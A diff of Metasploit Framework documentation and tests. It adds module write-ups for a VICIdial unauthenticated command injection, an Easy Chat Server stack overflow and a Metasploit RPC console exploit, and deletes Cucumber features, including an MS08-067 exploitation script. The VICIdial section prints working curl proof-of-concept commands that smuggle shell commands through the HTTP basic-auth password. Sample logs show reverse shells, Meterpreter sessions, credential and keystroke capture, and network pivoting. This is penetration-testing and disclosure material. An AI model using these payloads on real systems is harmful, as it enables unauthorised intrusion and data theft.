+  Windows PowerShell running as user user on WIN-SGBSD5TQUTQ
+  Copyright (C) 2015 Microsoft Corporation. All rights reserved.
+
+  PS C:\metasploit>whoami
+  win-sgbsd5tqutq\user
+  ```
+
+### Unix CMD Target
+
+  ```
+  msf > use exploit/multi/misc/msf_rpc_console 
+  msf exploit(msf_rpc_console) > set rhost 172.16.191.215
+  rhost => 172.16.191.215
+  msf exploit(msf_rpc_console) > set username msf
+  username => msf
+  msf exploit(msf_rpc_console) > set password abc123
+  password => abc123
+  msf exploit(msf_rpc_console) > set lhost 172.16.191.181
+  lhost => 172.16.191.181
+  msf exploit(msf_rpc_console) > set target 2
+  target => 2
+  msf exploit(msf_rpc_console) > set payload cmd/unix/reverse_python
+  payload => cmd/unix/reverse_python
+  msf exploit(msf_rpc_console) > run
+
+  [*] Started reverse TCP handler on 172.16.191.181:4444 
+  [+] 172.16.191.215:55552 - Authenticated successfully
+  [*] 172.16.191.215:55552 - Metasploit 4.15.0-dev-aceeedc
+  [*] 172.16.191.215:55552 - Ruby 2.3.0 x86_64-linux 2015-12-25
+  [*] 172.16.191.215:55552 - API version 1.0
+  [+] 172.16.191.215:55552 - Created console #0
+  [*] 172.16.191.215:55552 - Sending payload...
+  [*] Command shell session 3 opened (172.16.191.181:4444 -> 172.16.191.215:40768) at 2017-07-05 03:46:11 -0400
+
+  id
+  uid=0(root) gid=0(root) groups=0(root)
+  ```
+

documentation/modules/exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec.md

@@ -0,0 +1,133 @@
+## Description
+
+  This module exploits a vulnerability in VICIdial versions 2.9 RC1 to 2.13 RC1 which allows unauthenticated users to execute arbitrary operating system commands as the web server user if password encryption is enabled (disabled by default).
+
+  When password encryption is enabled the user's password supplied using HTTP basic authentication is used in a call to `exec()`.
+
+  This module has been tested successfully on version 2.11 RC2 and 2.13 RC1 on CentOS.
+
+
+## Vulnerable Application
+
+  VICIDIAL is a software suite that is designed to interact with the Asterisk Open-Source PBX Phone system to act as a complete inbound/outbound contact center suite with inbound email support as well. 
+
+  This module has been tested successfully on version 2.11 RC2 and 2.13 RC1 on CentOS.
+
+  Installers:
+
+  * [VICIdial 2.11 RC1](https://sourceforge.net/projects/astguiclient/files/astguiclient_2.11rc1.zip/download)
+  * [VICIdial 2.13 RC1](https://sourceforge.net/projects/astguiclient/files/astguiclient_2.13rc1.zip/download)
+
+  Follow the [instructions to enabled password encryption](http://vicidial.org/docs/ENCRYPTED_PASSWORDS.txt).
+
+
+## Technical Details
+
+  The `functions.php` file defines a function called `user_authorization`:
+
+  ```php
+  function user_authorization($user,$pass,$user_option,$user_update)
+  ```
+ 
+  This function is used throughout the application to validate user logon credentials supplied using HTTP basic authentication. If password encryption is enabled the user's password is passed to the `pass` argument of the `bp.pl` Perl script, without quotes, using PHP's `exec()` function:
+
+  ```php
+  if ($SSpass_hash_enabled > 0)
+          {
+          if (file_exists("../agc/bp.pl"))
+                  {$pass_hash = exec("../agc/bp.pl --pass=$pass");}
+          else
+                  {$pass_hash = exec("../../agc/bp.pl --pass=$pass");}
+  ```
+
+  A rudimentary blacklist is used to prevent command injection. The apostrophe `'`, quote `"`, semi-colon `;` and backslash `\` characters are removed from the user's username and password using `preg_replace`, like so:
+
+  ```php
+  $user = preg_replace("/\'|\"|\\\\|;/","",$user);
+  $pass = preg_replace("/\'|\"|\\\\|;/","",$pass);
+  ```
+
+  It is trivial to bypass the blacklist.
+
+  For example, backticks ``` ` ```, pipe `|` or ampersand `&` are sufficient to bypass the blacklist and execute arbitrary operating system commands.
+
+  For the purposes of exploitation, reaching the `user_authorization` function call with malicious input is hindered by additional input validation in use prior to the authentication check throughout the majority of the codebase:
+
+  ```php
+  $PHP_AUTH_USER = preg_replace('/[^-_0-9a-zA-Z]/', '', $PHP_AUTH_USER);
+  $PHP_AUTH_PW = preg_replace('/[^-_0-9a-zA-Z]/', '', $PHP_AUTH_PW);
+  ```
+
+  However, in VICIdial version 2.11RC2, at least two files did not make use of the additional validation:
+
+  * help.php
+  * vicidial_sales_viewer.php
+
+  In VICIdial version 2.13RC1, at least one file did not make use of the additional validation:
+
+  * vicidial_sales_viewer.php
+
+  This vulnerability was patched in revision 2759.
+
+
+## Proof of Concept
+
+  ```bash
+  $ curl -isk "https://VICIdial.local/vicidial/vicidial_sales_viewer.php" \
+  --user 'anyusername:anypassword& id>/tmp/pwned_by_sales_viewer #'
+  ```
+
+  ```bash
+  $ curl -isk "https://VICIdial.local/vicidial/help.php" \
+  --user 'anyusername:anypassword& id>/tmp/pwned_by_help #'
+  ```
+
+  Note that `/tmp/pwned_by_help` and `/tmp/pwned_by_sales_viewer` files should contain the results of the `id` command.
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec`
+  3. Do: `set rhost [IP]`
+  4. Do: `run`
+  5. You should get a session
+
+
+## Sample Output
+
+  ```
+  msf exploit(vicidial_user_authorization_unauth_cmd_exec) > check
+  [*] 172.16.191.150:80 The target appears to be vulnerable.
+  msf exploit(vicidial_user_authorization_unauth_cmd_exec) > run
+
+  [*] Started reverse TCP handler on 172.16.191.181:4444 
+  [*] 172.16.191.150:80 Sending payload (505 bytes)
+  [+] 172.16.191.150:80 Payload sent successfully
+  [*] Command shell session 1 opened (172.16.191.181:4444 -> 172.16.191.150:36660) at 2017-05-27 01:00:41 -0400
+
+  id
+  uid=48(apache) gid=48(apache) groups=48(apache)
+  ```
+
+
+## Sample Output (Verbose)
+
+  ```
+  msf exploit(vicidial_user_authorization_unauth_cmd_exec) > set verbose true
+  verbose => true
+  msf exploit(vicidial_user_authorization_unauth_cmd_exec) > check
+
+  [*] 172.16.191.150:80 Password encryption is supported, but may not be enabled.
+  [*] 172.16.191.150:80 The target appears to be vulnerable.
+  msf exploit(vicidial_user_authorization_unauth_cmd_exec) > run
+
+  [*] Started reverse TCP handler on 172.16.191.181:4444 
+  [*] 172.16.191.150:80 Sending payload (505 bytes)
+  [+] 172.16.191.150:80 Payload sent successfully
+  [*] Command shell session 2 opened (172.16.191.181:4444 -> 172.16.191.150:36661) at 2017-05-27 01:00:48 -0400
+
+  id
+  uid=48(apache) gid=48(apache) groups=48(apache)
+  ```
+

documentation/modules/exploit/windows/http/easychatserver_seh.md

@@ -0,0 +1,53 @@
+## Description
+
+This module exploits a vulnerability in the EFS Easy Chat Server application versions 2 through 3.1. The username parameter in the Registration page 'register.php', which is prone to a stack overflow vulnerability.
+
+This module allows a remote attacker to execute a payload under the context of the user running the Easy Chat Server application
+
+## Vulnerable Application
+
+[Easy Chat Server](http://echatserver.com/) Easy Chat Server is an easy, fast and affordable way to host and manage real-time communication software.
+
+This module has been tested successfully on
+
+ * Easy Chat Server 3.1 on Windows XP En SP3
+
+Installers:
+
+[EFS Easy Chat Server Installers](http://echatserver.com/ecssetup.exe)
+
+## Verification Steps
+
+ 1. Start `msfconsole`
+ 2. Do: `use exploits/windows/http/easychatserver_seh`
+ 3. Do: `set rhosts [IP]`
+ 4. Do: `exploit`
+ 5. You should get your payload executed
+
+## Scenarios
+
+```
+marco@kali:~$ msfconsole -q
+msf > use exploit/windows/http/easychatserver_seh
+msf exploit(easychatserver_seh) > set RHOST 192.168.56.101
+RHOST => 192.168.56.101
+msf exploit(easychatserver_seh) > exploit
+
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[*] Sending stage (957487 bytes) to 192.168.56.101
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1037) at 2017-06-20 00:43:51 +0200
+
+meterpreter > sysinfo
+Computer    	: MM-8B040C5B05D9
+OS          	: Windows XP (Build 2600, Service Pack 3).
+Architecture	: x86
+System Language : en_US
+Domain      	: WORKGROUP
+Logged On Users : 2
+Meterpreter 	: x86/windows
+meterpreter > exit
+[*] Shutting down Meterpreter...
+
+[*] 192.168.56.101 - Meterpreter session 1 closed.  Reason: User exit
+msf exploit(easychatserver_seh) >
+```

documentation/modules/exploit/windows/http/easyfilesharing_post.md

@@ -1,8 +1,8 @@
 ## Description
 
-This module exploits a vulnerability in the Easy File Sharing Web Server application, by exploiting an overflow in the Email Post parameter, through DEP bypass via ROP chain.
+This module exploits a vulnerability in the Easy File Sharing Web Server application. It uses an overflow in the Email Post parameter, bypassing DEP via a ROP chain.
 
-This module allows a remote attacker to get a payload executed under the context of the user running the Easy File Sharing application
+This module allows a remote attacker to execute a payload under the context of the user running the Easy File Sharing application
 
 ## Vulnerable Application
 
@@ -10,7 +10,7 @@ This module allows a remote attacker to get a payload executed under the context
 
 This module has been tested successfully on
 
-* Easy File Sharing 7.2 on Windows XP En Sp3
+ * Easy File Sharing 7.2 on Windows XP En Sp3
 
 Installers:
 
@@ -18,11 +18,11 @@ Installers:
 
 ## Verification Steps
 
-1. Start `msfconsole`
+ 1. Start `msfconsole`
-2. Do: `use exploits/windows/http/easyfilesharing_post`
+ 2. Do: `use exploits/windows/http/easyfilesharing_post`
-3. Do: `set rhosts [IP]`
+ 3. Do: `set rhosts [IP]`
-4. Do: `exploit`
+ 4. Do: `exploit`
-5. You should get your payload executed
+ 5. You should get your payload executed
 
 ## Scenarios
 
@@ -32,11 +32,11 @@ msf > use exploit/windows/http/easyfilesharing_post
 msf exploit(easyfilesharing_post) > set RHOST 192.168.56.101
 RHOST => 192.168.56.101
 msf exploit(easyfilesharing_post) > exploit
- 
+
 [*] Started reverse TCP handler on 192.168.56.1:4444
 [*] Sending stage (957487 bytes) to 192.168.56.101
 [*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1253) at 2017-06-17 22:45:34 +0200
- 
+
 meterpreter > sysinfo
 Computer    	: MM
 OS          	: Windows XP (Build 2600, Service Pack 3).
@@ -47,7 +47,7 @@ Logged On Users : 2
 Meterpreter 	: x86/windows
 meterpreter > exit
 [*] Shutting down Meterpreter...
- 
+
 [*] 192.168.56.101 - Meterpreter session 1 closed.  Reason: User exit
 msf exploit(easyfilesharing_post) >
 ```

documentation/modules/payload/windows/meterpreter/reverse_tcp.md

@@ -90,7 +90,7 @@ For example:
 meterpreter > download C:\\Users\\user\\Desktop\\something.txt /tmp/
 [*] downloading: C:\Users\user\Desktop\something.txt -> /tmp//something.txt
 [*] download   : C:\Users\user\Desktop\something.txt -> /tmp//something.txt
-meterpreter > 
+meterpreter >
 ```
 
 The ```-r``` option for the command also allows you to download recursively.
@@ -154,7 +154,7 @@ Process 2076 created.
 To pass an argument, use the ```-a``` flag:
 
 ```
-meterpreter > execute -f iexplore.exe -a http://metasploit.com
+meterpreter > execute -f iexplore.exe -a https://metasploit.com
 Process 2016 created.
 ```
 
@@ -194,7 +194,7 @@ System Language : en_US
 Domain          : WORKGROUP
 Logged On Users : 2
 Meterpreter     : x86/win32
-meterpreter > 
+meterpreter >
 ```
 
 **keyscan_start**
@@ -283,7 +283,7 @@ repeatedly, you can use the auto_win32_multihandler.rc resource script in Metasp
 First, run the resource script:
 
 ```
-$ ./msfconsole -q -r scripts/resource/auto_win32_multihandler.rc 
+$ ./msfconsole -q -r scripts/resource/auto_win32_multihandler.rc
 [*] Processing scripts/resource/auto_win32_multihandler.rc for ERB directives.
 [*] resource (scripts/resource/auto_win32_multihandler.rc)> Ruby Code (776 bytes)
 lhost => 192.168.1.199
@@ -297,9 +297,9 @@ lport => 4444
 exitonsession => false
 [*] Exploit running as background job.
 
-[*] Started reverse TCP handler on 192.168.1.199:4444 
+[*] Started reverse TCP handler on 192.168.1.199:4444
 [*] Starting the payload handler...
-msf exploit(handler) > 
+msf exploit(handler) >
 ```
 
 Next, go to your ~/.msf4/local directory, you should see meterpreter_reverse_tcp.exe in there.
@@ -315,7 +315,7 @@ from popular applications and enumerate or modify system settings.
 To use a post module from the Meterpreter prompt, simply use the ```run``` command:
 
 ```
-meterpreter > run post/windows/gather/checkvm 
+meterpreter > run post/windows/gather/checkvm
 
 [*] Checking if WIN-6NH0Q8CJQVM is a Virtual Machine .....
 [*] This is a VMware Virtual Machine
@@ -336,7 +336,7 @@ To begin, load the extension:
 ```
 meterpreter > load mimikatz
 Loading extension mimikatz...success.
-meterpreter > 
+meterpreter >
 ```
 
 This will create more commands for the Meterpreter prompt. Most of them are meant to be used to
@@ -387,7 +387,7 @@ To begin, at the Meterpreter prompt, do:
 ```
 meterpreter > load extapi
 Loading extension extapi...success.
-meterpreter > 
+meterpreter >
 ```
 
 One great feature of the extension is clipboard management. The Windows clipboard is interesting
@@ -412,7 +412,7 @@ Text captured at 2016-03-05 19:13:39.0170
 hello, world!!
 =========================================
 
-meterpreter > 
+meterpreter >
 ```
 
 The limitation of this command is that since you're only grabbing whatever is in the clipboard at
@@ -422,7 +422,7 @@ whatever goes in there. To start, issue the following command:
 ```
 meterpreter > clipboard_monitor_start
 [+] Clipboard monitor started
-meterpreter > 
+meterpreter >
 ```
 
 While it is monitoring, you can ask Meterpreter to dump whatever's been captured.
@@ -444,7 +444,7 @@ download    : C:\Users\user\Desktop\cat_pic.png -> ./cat_pic.png
 ==========================================
 
 [+] Clipboard monitor dumped
-meterpreter > 
+meterpreter >
 ```
 
 The ```clipboard_monitor_stop``` command will also dump the captured data, and then exit.
@@ -471,7 +471,7 @@ meterpreter > python_execute "x = 'hello world'; print x"
 [+] Content written to stdout:
 hello world
 
-meterpreter > 
+meterpreter >
 ```
 
 Another way to execute Python code is from a local file by using the ```python_import``` command.
@@ -503,13 +503,13 @@ To learn more about the Python extension, please read this [wiki](https://github
 
 **Network Pivoting**
 
-There are three mains ways that you can use for moving around inside a network: 
+There are three mains ways that you can use for moving around inside a network:
 
  - The route command in the msf prompt
  - The route command in the the Meterpreter prompt
  - The portfwd command
 
-***Routing through msfconsole*** 
+***Routing through msfconsole***
 
 The route command from the msf prompt allows you connect to hosts on a different network through the compromised machine. You should be able to determine that by looking at the compromised machine's ipconfig:
 
@@ -547,7 +547,7 @@ IPv4 Netmask : 255.255.255.255
 ...
 ```
 
-The example above shows that we have a Meterpreter connection to 192.168.1.201. Let's call this box A, and it  is connected to the 192.100.0.0/24 VPN network. As an attacker, we aren't connected to this network directly, but we can explore that network through box A. 
+The example above shows that we have a Meterpreter connection to 192.168.1.201. Let's call this box A, and it  is connected to the 192.100.0.0/24 VPN network. As an attacker, we aren't connected to this network directly, but we can explore that network through box A.
 
 At the msf prompt, do:
 
@@ -566,7 +566,7 @@ msf auxiliary(smb_version) > run
 [*] 192.100.0.101:445     - 192.100.0.101:445 is running Windows 2003 SP2 (build:3790) (name:SINN3R-QIXN9TA2) (domain:WORKGROUP)
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
-msf auxiliary(smb_version) > 
+msf auxiliary(smb_version) >
 ```
 
 Another neat trick using route is that you can also bypass the compromised host's firewall this way. For example, if the host has HTTP open, but SMB is blocked by the firewall, you can try to compromise it via HTTP first. You'll need to use the route command to talk to SMB and then try to exploit SMB.
@@ -628,7 +628,7 @@ The timeout control basically defines the life span of Meterpreter. To configure
 ```set_timeouts``` command:
 
 ```
-meterpreter > set_timeouts 
+meterpreter > set_timeouts
 Usage: set_timeouts [options]
 
 Set the current timeout options.
@@ -671,7 +671,7 @@ meterpreter > irb
 [*] Starting IRB shell
 [*] The 'client' variable holds the meterpreter client
 
->> 
+>>
 ```
 
 **The client object**

documentation/modules/post/windows/manage/archmigrate.md

@@ -1,5 +1,6 @@
 ## Creating A Testing Environment
-  To use this module you need an x86 executable type meterpreter on a x64 windows machine.
+
+To use this module you need an x86 executable type meterpreter on a x64 windows machine.
 
 This module has been tested against:
 
@@ -23,9 +24,10 @@ This module was not tested against, but may work against:
 
 ### Windows 10 x64
 
+```
     msf exploit(handler) > run
 
-    [*] Started reverse TCP handler on <MSF_IP>:4567 
+    [*] Started reverse TCP handler on <MSF_IP>:4567
     [*] Starting the payload handler...
     [*] Sending stage (957487 bytes) to <Win10x64_IP>
     [*] Meterpreter session 1 opened (<MSF_IP>:4567 -> <Win10x64_IP>:50917) at 2017-03-22 11:43:42 -0500
@@ -39,8 +41,8 @@ This module was not tested against, but may work against:
     Logged On Users : 2
     Meterpreter     : x86/windows
     meterpreter > background
-    [*] Backgrounding session 1...                
+    [*] Backgrounding session 1...
-    msf exploit(handler) > use post/windows/manage/archmigrate 
+    msf exploit(handler) > use post/windows/manage/archmigrate
     msf post(archmigrate) > set session 1
     session => 1
     msf post(archmigrate) > run
@@ -70,4 +72,5 @@ This module was not tested against, but may work against:
     System Language : en_US
     Domain          : WORKGROUP
     Logged On Users : 2
-    Meterpreter     : x64/windows
+    Meterpreter     : x64/windows
+```

features/commands/help.feature

@@ -1,111 +0,0 @@
-Feature: Help command
-
-  Background:
-    Given I run `msfconsole --defer-module-loads -q -x help -x exit`
-
-  Scenario: The 'help' command's output
-    Then the output should contain:
-      """
-      Core Commands
-      =============
-
-          Command       Description
-          -------       -----------
-          ?             Help menu
-          banner        Display an awesome metasploit banner
-          cd            Change the current working directory
-          color         Toggle color
-          connect       Communicate with a host
-          exit          Exit the console
-          get           Gets the value of a context-specific variable
-          getg          Gets the value of a global variable
-          grep          Grep the output of another command
-          help          Help menu
-          history       Show command history
-          irb           Drop into irb scripting mode
-          load          Load a framework plugin
-          quit          Exit the console
-          route         Route traffic through a session
-          save          Saves the active datastores
-          sessions      Dump session listings and display information about sessions
-          set           Sets a context-specific variable to a value
-          setg          Sets a global variable to a value
-          sleep         Do nothing for the specified number of seconds
-          spool         Write console output into a file as well the screen
-          threads       View and manipulate background threads
-          unload        Unload a framework plugin
-          unset         Unsets one or more context-specific variables
-          unsetg        Unsets one or more global variables
-          version       Show the framework and console library version numbers
-
-
-      Module Commands
-      ===============
-
-          Command       Description
-          -------       -----------
-          advanced      Displays advanced options for one or more modules
-          back          Move back from the current context
-          edit          Edit the current module with the preferred editor
-          info          Displays information about one or more modules
-          loadpath      Searches for and loads modules from a path
-          options       Displays global options or for one or more modules
-          popm          Pops the latest module off the stack and makes it active
-          previous      Sets the previously loaded module as the current module
-          pushm         Pushes the active or list of modules onto the module stack
-          reload_all    Reloads all modules from all defined module paths
-          search        Searches module names and descriptions
-          show          Displays modules of a given type, or all modules
-          use           Selects a module by name
-
-
-      Job Commands
-      ============
-
-          Command       Description
-          -------       -----------
-          handler       Start a payload handler as job
-          jobs          Displays and manages jobs
-          kill          Kill a job
-          rename_job    Rename a job
-
-
-      Resource Script Commands
-      ========================
-
-          Command       Description
-          -------       -----------
-          makerc        Save commands entered since start to a file
-          resource      Run the commands stored in a file
-
-
-      Database Backend Commands
-      =========================
-
-          Command           Description
-          -------           -----------
-          db_connect        Connect to an existing database
-          db_disconnect     Disconnect from the current database instance
-          db_export         Export a file containing the contents of the database
-          db_import         Import a scan result file (filetype will be auto-detected)
-          db_nmap           Executes nmap and records the output automatically
-          db_rebuild_cache  Rebuilds the database-stored module cache
-          db_status         Show the current database status
-          hosts             List all hosts in the database
-          loot              List all loot in the database
-          notes             List all notes in the database
-          services          List all services in the database
-          vulns             List all vulnerabilities in the database
-          workspace         Switch between database workspaces
-
-
-    Credentials Backend Commands
-    ============================
-
-          Command       Description
-          -------       -----------
-          creds         List all credentials in the database
-
-
-      """
-

features/modules/exploit/smb/ms08_067_netapi.feature

@@ -1,48 +0,0 @@
-@targets @db
-Feature: MS08-067 netapi
-
-  Background:
-    Given a directory named "home"
-    And I cd to "home"
-    And a mocked home directory
-
-  Scenario: The MS08-067 should get a session with bind_tcp
-    Given I ready the windows targets
-    Given a file named "ms08-067-bind.rc" with:
-      """
-      <ruby>
-      self.run_single("spool #{Rails.root.join('tmp', 'console.log')}")
-      hosts           = YAML.load File.open Rails.root.join('features', 'support', 'targets.yml')
-      payload_name    = 'windows/meterpreter/bind_tcp'
-      exploited_hosts = []
-      failed_hosts    = []
-
-      hosts.each do |host|
-        print_status("Trying MS08-067 against #{host['ipAddress']}")
-        mod = framework.exploits.create('windows/smb/ms08_067_netapi')
-        mod.datastore['PAYLOAD'] = payload_name
-        mod.datastore['RHOST'] = host['ipAddress']
-        m = mod.exploit_simple(
-          'LocalInput'  => nil,
-          'LocalOutput' => nil,
-          'Payload'     => payload_name,
-          'RunAsJob'    => false
-        )
-
-        sleep(1)
-
-        if m
-          exploited_hosts << host['ipAddress']
-        else
-          failed_hosts << host['ipAddress']
-        end
-      end
-
-      print_status("Exploited hosts: #{exploited_hosts.inspect}")
-      print_status("Failed hosts: #{failed_hosts.inspect}")
-      self.run_single('sessions -K')
-      </ruby>
-      """
-    When I successfully run `msfconsole --environment test -q -r ms08-067-bind.rc -x exit` for up to 100 seconds
-    Then the 'Mdm::Host' table contains the expected targets
-    

features/msfconsole/database_yml.feature

@@ -1,153 +0,0 @@
-@boot
-Feature: `msfconsole` `database.yml`
-
-  In order to connect to the database in `msfconsole`
-  As a user calling `msfconsole` from a terminal
-  I want to be able to set the path of the `database.yml` in one of 4 locations (in order of precedence):
-
-  1. An explicit argument to the `-y` flag to `msfconsole`
-  2. The MSF_DATABASE_CONFIG environment variable
-  3. The user's `~/.msf4/database.yml`
-  4. `config/database.yml` in the metasploit-framework checkout location.
-
-  Scenario: With all 4 locations, --yaml wins
-    Given a file named "command_line.yml" with:
-      """
-      test:
-        adapter: postgresql
-        database: command_line_metasploit_framework_test
-        username: command_line_metasploit_framework_test
-      """
-    And a file named "msf_database_config.yml" with:
-      """
-      test:
-        adapter: postgresql
-        database: environment_metasploit_framework_test
-        username: environment_metasploit_framework_test
-      """
-    And I set the environment variables to:
-      | variable            | value                   |
-      | MSF_DATABASE_CONFIG | msf_database_config.yml |
-    And a directory named "home"
-    And I cd to "home"
-    And a mocked home directory
-    And a directory named ".msf4"
-    And I cd to ".msf4"
-    And a file named "database.yml" with:
-      """
-      test:
-        adapter: postgresql
-        database: user_metasploit_framework_test
-        username: user_metasploit_framework_test
-      """
-    And I cd to "../.."
-    And the project "database.yml" exists with:
-      """
-      test:
-        adapter: postgresql
-        database: project_metasploit_framework_test
-        username: project_metasploit_framework_test
-      """
-    When I run `msfconsole -q --defer-module-loads --environment test --execute-command exit --yaml command_line.yml`
-    Then the output should contain "command_line_metasploit_framework_test"
-
-  Scenario: Without --yaml, MSF_DATABASE_CONFIG wins
-    Given a file named "msf_database_config.yml" with:
-      """
-      test:
-        adapter: postgresql
-        database: environment_metasploit_framework_test
-        username: environment_metasploit_framework_test
-      """
-    And I set the environment variables to:
-      | variable            | value                   |
-      | MSF_DATABASE_CONFIG | msf_database_config.yml |
-    And a directory named "home"
-    And I cd to "home"
-    And a mocked home directory
-    And a directory named ".msf4"
-    And I cd to ".msf4"
-    And a file named "database.yml" with:
-      """
-      test:
-        adapter: postgresql
-        database: user_metasploit_framework_test
-        username: user_metasploit_framework_test
-      """
-    And I cd to "../.."
-    And the project "database.yml" exists with:
-      """
-      test:
-        adapter: postgresql
-        database: project_metasploit_framework_test
-        username: project_metasploit_framework_test
-      """
-    When I run `msfconsole -q --defer-module-loads --environment test --execute-command exit`
-    Then the output should contain "environment_metasploit_framework_test"
-
-  Scenario: Without --yaml or MSF_DATABASE_CONFIG, ~/.msf4/database.yml wins
-    Given I unset the environment variables:
-      | variable            |
-      | MSF_DATABASE_CONFIG |
-    And a directory named "home"
-    And I cd to "home"
-    And a mocked home directory
-    And a directory named ".msf4"
-    And I cd to ".msf4"
-    And a file named "database.yml" with:
-      """
-      test:
-        adapter: postgresql
-        database: user_metasploit_framework_test
-        username: user_metasploit_framework_test
-      """
-    And I cd to "../.."
-    And the project "database.yml" exists with:
-      """
-      test:
-        adapter: postgresql
-        database: project_metasploit_framework_test
-        username: project_metasploit_framework_test
-      """
-    When I run `msfconsole -q --defer-module-loads --environment test --execute-command exit`
-    Then the output should contain "user_metasploit_framework_test"
-
-  Scenario: Without --yaml, MSF_DATABASE_CONFIG or ~/.msf4/database.yml, project "database.yml" wins
-    Given I unset the environment variables:
-      | variable            |
-      | MSF_DATABASE_CONFIG |
-    And a directory named "home"
-    And I cd to "home"
-    And a mocked home directory
-    And I cd to "../.."
-    And the project "database.yml" exists with:
-      """
-      test:
-        adapter: postgresql
-        database: project_metasploit_framework_test
-        username: project_metasploit_framework_test
-      """
-    When I run `msfconsole -q --defer-module-loads --environment test --execute-command db_status --execute-command exit`
-    Then the output should contain "project_metasploit_framework_test"
-
-
-  Scenario: Without --yaml, MSF_DATABASE_CONFIG, ~/.msf4/database.yml, or project "database.yml", no database connection
-    Given I unset the environment variables:
-      | variable            |
-      | MSF_DATABASE_CONFIG |
-    And a directory named "home"
-    And I cd to "home"
-    And a mocked home directory
-    And I cd to "../.."
-    And the project "database.yml" does not exist
-    When I run `msfconsole -q --defer-module-loads --environment test --execute-command db_status --execute-command exit`
-    Then the output should not contain "command_line_metasploit_framework_test"
-    And the output should not contain "environment_metasploit_framework_test"
-    And the output should not contain "user_metasploit_framework_test"
-    And the output should not contain "project_metasploit_framework_test"
-    And the output should contain "[*] postgresql selected, no connection"
-
-  Scenario: Starting `msfconsole` with a valid database.yml
-    When I run `msfconsole -q --defer-module-loads --execute-command db_status --execute-command exit`
-    Then the output should contain "[*] postgresql connected to metasploit_framework_test"
-

features/step_definitions/environment_variables.rb

@@ -1,20 +0,0 @@
-Given /^I unset the environment variables:$/ do |table|
-  table.hashes.each do |row|
-    variable = row['variable'].to_s.upcase
-
-    # @todo add extension to Announcer
-    announcer.instance_eval do
-      if @options[:env]
-        print "$ unset #{variable}"
-      end
-    end
-
-    current_value = ENV.delete(variable)
-
-    # if original_env already has the key, then the true original was already recorded from a previous unset or set,
-    # so don't record the current value as it will cause ENV not to be restored after the Scenario.
-    unless original_env.key? variable
-      original_env[variable] = current_value
-    end
-  end
-end

features/step_definitions/project.rb

@@ -1,14 +0,0 @@
-require 'metasploit/framework/database/cucumber'
-
-Given /^the project "database.yml" does not exist$/ do
-  Metasploit::Framework::Database::Cucumber.backup_project_configurations
-end
-
-Given /^the project "database.yml" exists with:$/ do |file_content|
-  Metasploit::Framework::Database::Cucumber.backup_project_configurations
-  File.open(Metasploit::Framework::Database::Cucumber.project_configurations_path, 'wb') { |file| file.write(file_content) }
-end
-
-After do
-  Metasploit::Framework::Database::Cucumber.restore_project_configurations
-end

features/support/bin/stty

@@ -1,26 +0,0 @@
-#!/usr/bin/env ruby
-
-case ARGV[0]
-  when 'size'
-    puts "30 134"
-  when '-a'
-    puts <<EOS
-speed 38400 baud; 30 rows; 134 columns;
-lflags: icanon isig iexten echo echoe echok echoke -echonl echoctl
-	-echoprt -altwerase -noflsh -tostop -flusho pendin -nokerninfo
-	-extproc
-iflags: -istrip icrnl -inlcr -igncr ixon -ixoff ixany imaxbel iutf8
-	-ignbrk brkint -inpck -ignpar -parmrk
-oflags: opost onlcr -oxtabs -onocr -onlret
-cflags: cread cs8 -parenb -parodd hupcl -clocal -cstopb -crtscts -dsrflow
-	-dtrflow -mdmbuf
-cchars: discard = ^O; dsusp = ^Y; eof = ^D; eol = <undef>;
-	eol2 = <undef>; erase = ^?; intr = ^C; kill = ^U; lnext = ^V;
-	min = 1; quit = ^\; reprint = ^R; start = ^Q; status = ^T;
-	stop = ^S; susp = ^Z; time = 0; werase = ^W;
-EOS
-  when '-g'
-    puts "gfmt1:cflag=4b00:iflag=6b02:lflag=200005cf:oflag=3:discard=f:dsusp=19:eof=4:eol=ff:eol2=ff:erase=7f:intr=3:kill=15:lnext=16:min=1:quit=1c:reprint=12:start=11:status=14:stop=13:susp=1a:time=0:werase=17:ispeed=38400:ospeed=38400"
-end
-
-exit 0

features/support/env.rb

@@ -1,34 +0,0 @@
-# @note `require 'simplecov'` is not used here because all features currently use external `msfconsole` process, so only
-#   that child process needs to load 'simplecov'.
-
-# IMPORTANT: This file is generated by cucumber-rails - edit at your own peril.
-# It is recommended to regenerate this file in the future when you upgrade to a 
-# newer version of cucumber-rails. Consider adding your own code to a new file 
-# instead of editing this one. Cucumber will automatically load all features/**/*.rb
-# files.
-
-require 'cucumber/rails'
-require 'aruba/cucumber'
-
-# Capybara defaults to XPath selectors rather than Webrat's default of CSS3. In
-# order to ease the transition to Capybara we set the default here. If you'd
-# prefer to use XPath just remove this line and adjust any selectors in your
-# steps to use the XPath syntax.
-Capybara.default_selector = :css
-
-# By default, any exception happening in your Rails application will bubble up
-# to Cucumber so that your scenario will fail. This is a different from how 
-# your application behaves in the production environment, where an error page will 
-# be rendered instead.
-#
-# Sometimes we want to override this default behaviour and allow Rails to rescue
-# exceptions and display an error page (just like when the app is running in production).
-# Typical scenarios where you want to do this is when you test your error pages.
-# There are two ways to allow Rails to rescue exceptions:
-#
-# 1) Tag your scenario (or feature) with @allow-rescue
-#
-# 2) Set the value below to true. Beware that doing this globally is not
-# recommended as it will mask a lot of errors for you!
-#
-ActionController::Base.allow_rescue = false

features/support/hooks.rb

@@ -1,39 +0,0 @@
-Before do
-  set_env('MSF_DATBASE_CONFIG', Rails.configuration.paths['config/database'].existent.first)
-  set_env('RAILS_ENV', 'test')
-  @aruba_timeout_seconds = 8.minutes
-end
-
-Before('@db') do |scenario|
-  dbconfig = YAML::load(File.open(Metasploit::Framework::Database.configurations_pathname))
-  ActiveRecord::Base.establish_connection(dbconfig["test"])
-end
-
-# don't setup child processes to load simplecov_setup.rb if simplecov isn't installed
-# unless Bundler.settings.without.include?(:coverage)
-#   Before do |scenario|
-#     command_name = case scenario
-#                    when Cucumber::Ast::Scenario, Cucumber::Ast::ScenarioOutline
-#                      "#{scenario.feature.title} #{scenario.name}"
-#                    when Cucumber::Ast::OutlineTable::ExampleRow
-#                      scenario_outline = scenario.scenario_outline
-#
-#                      "#{scenario_outline.feature.title} #{scenario_outline.name} #{scenario.name}"
-#                    else
-#                      raise TypeError, "Don't know how to extract command name from #{scenario.class}"
-#                    end
-#
